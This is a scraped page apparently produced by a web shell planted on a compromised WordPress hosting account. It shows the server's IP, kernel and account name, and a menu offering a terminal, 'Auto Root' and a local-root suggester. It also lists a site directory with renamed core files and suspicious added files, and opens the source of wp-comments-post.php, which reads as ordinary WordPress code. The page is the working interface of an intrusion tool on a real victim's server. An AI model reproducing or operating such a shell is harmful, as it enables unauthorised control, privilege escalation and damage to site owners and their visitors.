Linux premium256.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
niyknzcu /
whiteteakllc.com /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb__d97c8de
[ DIR ]
drwxrwxrwx
2026-04-20 06:37
.well-known__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
68c37776
[ DIR ]
drwxr-xr-x
2026-04-20 13:24
cgi-bin__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
fb1be__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
test__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
wp-admin__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
wp-content__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 07:50
wp-includes__d97c8de
[ DIR ]
drwxr-xr-x
2026-04-20 06:37
.hcflag__d97c8de
31
B
-rw-r--r--
2026-04-14 16:31
.htaccess
498
B
-rw-r--r--
2026-04-24 05:56
.htaccess.bk__d97c8de
1.96
KB
-rw-r--r--
2024-03-05 08:05
.litespeed_flag__d97c8de
297
B
-rw-r--r--
2026-04-20 01:36
error_log
352
B
-rw-r--r--
2026-04-20 06:30
error_log__d97c8de
22.91
KB
-rw-r--r--
2026-04-20 04:08
google2b4ed44d8f7447b4.html
53
B
-rw-r--r--
2026-04-27 08:04
google3a2fa76329422a80.html__d97c8de
53
B
-rw-r--r--
2026-03-27 06:21
index.php
95.65
KB
-rw-r--r--
2026-04-20 07:54
license.txt__d97c8de
19.44
KB
-rw-r--r--
2025-12-03 01:11
readme.html__d97c8de
7.25
KB
-rw-r--r--
2026-03-16 09:43
style.php__d97c8de
26
B
-rw-r--r--
2026-03-29 01:13
txets.php
5.91
KB
-r--r--r--
2026-04-24 05:56
wZhOSd6abp2KhPym0JL47qeEVHc4oBDB.php__d97c8de
243
B
-rw-r--r--
2026-03-24 21:04
wp-activate.php__d97c8de
7.18
KB
-rw-r--r--
2025-12-03 01:11
wp-blog-header.php__d97c8de
361
B
-rw-r--r--
2026-04-18 22:45
wp-comments-post.php__d97c8de
2.27
KB
-rw-r--r--
2024-03-04 07:30
wp-config-sample.php__d97c8de
6
KB
-rw-r--r--
2026-04-17 01:36
wp-config.php__d97c8de
3.31
KB
-rw-r--r--
2026-04-18 22:47
wp-links-opml.php__d97c8de
2.43
KB
-rw-r--r--
2025-12-03 01:11
wp-load.php__d97c8de
3.88
KB
-rw-r--r--
2026-04-18 22:50
wp-login.php__d97c8de
50.23
KB
-rw-r--r--
2025-12-03 01:11
wp-mail.php__d97c8de
8.52
KB
-rw-r--r--
2025-12-03 01:11
wp-settings.php__d97c8de
30.33
KB
-rw-r--r--
2026-04-18 22:44
wp-signup.php__d97c8de
33.71
KB
-rw-r--r--
2025-04-15 21:13
wp-trackback.php__d97c8de
5.09
KB
-rw-r--r--
2025-12-03 01:11
wp-xmlwhi.php__d97c8de
420
B
-rw-r--r--
2024-03-04 07:58
x.zip__d97c8de
5.59
KB
-rw-r--r--
2026-03-29 01:13
xmlrpc.php__d97c8de
3.13
KB
-rw-r--r--
2025-04-15 21:13
z000.gz__d97c8de
57.59
KB
-rw-r--r--
2026-03-29 01:08
Save
Rename
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) { $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } header( 'Allow: POST' ); header( "$protocol 405 Method Not Allowed" ); header( 'Content-Type: text/plain' ); exit; } /** Sets up the WordPress Environment. */ require __DIR__ . '/wp-load.php'; nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = (int) $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( '<p>' . $comment->get_error_message() . '</p>', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Fires after comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;